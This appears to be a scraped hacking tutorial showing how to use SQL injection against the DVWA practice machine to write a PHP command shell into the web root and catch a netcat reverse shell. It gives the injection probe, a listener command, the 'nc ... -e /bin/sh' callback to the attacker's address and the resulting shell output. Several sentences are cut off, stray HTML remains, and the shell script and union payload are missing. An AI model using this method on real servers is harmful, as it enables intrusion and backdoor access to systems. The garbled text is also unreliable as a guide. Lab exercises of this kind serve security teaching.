One of the ultimate goals in hacking is the ability to obtain shells in order to run system commands and own a target or network. SQL injection is typically associated with databases and their data, but it can actually be used as a vector to gain a command shell.
We want to use DVWA, an intentionally vulnerable virtual machine, and Kali Linux to carry out our attack , SQL injection is one of the most common vulnerabilities.
There are many different types of SQL injection and different attack methods for the various database systems in use. Although this type of attack is one of the easiest to get started with, SQL injection can take years to truly master.
: Target enumeration
DVWA using the default credentials, admin The first thing we need to do is log in to DVWA using the default credentials ] as the username and password as the password.
Next, go to the "Security" tab on the left, and set the security level to "low."
Navigate to the "SQL Injection" page to begin our attack. How to Use SQL Injection to Run OS Commands & Get a Shell ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>
We want to verify that input is actually vulnerable to SQL injection. Which will indeed close vulnerable. When we do this, we see that it returns an error, even telling us that it is using MySQL as the database.
select first_name, surname from users where user_id = '';
This is probably what the query looks like on the backend, with first_name and surname being the selected columns, for a total of two columns. But we need to know for sure in order for this to work. For that, we can use the order by clause.
This clause wants to sort out the results of the query by columns. Since we are pretty sure there are at least two columns in use, if we order by 1 or 2, the query should be complete successfully. But what if we want to order by 3? If we are correct, then this query should throw an error.
Submit the following injection as input, and it should result in an error.
'order by 3 #
We can see that we do not get any error, so now we
Step 2: Shell Access & Command Execution
Now that we have a little more information about the database, we can use this to our advantage to perform a union-based SQL injection. The union select select statements, but have the same number of columns.
There are many things we can do with union-based injections, but this tutorial OS commands.
We need to determine the root directory of the web server to upload our shell. Depending on the application and the type of web server in use, this can vary, especially if an admin changes the default location or adequate permissions are in place. For the purposes of this demo, we will assume that the default web root of Apache ( / var / www / ) is public write permissions. Information about the web server, including the root directory, can usually be found in the "phpinfo.php" file.
We can use the into outfile command to write to a file. In this case, we want to insert a simple PHP script, which will be able to run system commands. The script, which we will aptly name "cmd.php," should look like this:
Now, let's perform the injection. The second part of the statement in single quotes – this will avoid syntax errors.
We want to first set up the listener on our local machine. Use the nc command along with the flags -lvp to specify, to verbose, and to set the port number, respectively.
nc -lvp 1234
listening on [any] 1234 ...
Next, as the parameter to our php shell in the url, enter the following command. It tells the server to execute a shell ( -e / bin / sh ) and send it back to our local machine.
nc 172.16.1.100 1234 -e / bin / sh
Give it a few seconds, and we should see our listener catch the shell and open a connection. id uname -a and ps as we see fit.
connect to [172.16.1.100] from (UNKNOWN ) [172.16.1.102] 47643
uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
PID TTY TIME CMD
4665? 00:00:00 apache2
4669? 00:00:00 apache2
4671? 00:00:00 apache2
4673? 00:00:00 apache2
4674? 00:00:00 apache2
4803? 00:00:00 apache2
4810? 00:00:00 apache2
4914? 00:00:00 php
4915? 00:00:00 sh
4919? 00:00:00 ps
In this guide, we learn how to identify a vulnerable SQL injection point, enumerate the backend database, and use that information to upload a simple shell to the target system to get a reverse shell, allowing backdoor access to the web server. Do not miss: How to Use Netcat, the Swiss Army Knife of Hacking Tools
Cover image by NewPaddy / Pixabay; Screenshots by drd_ / Null Byte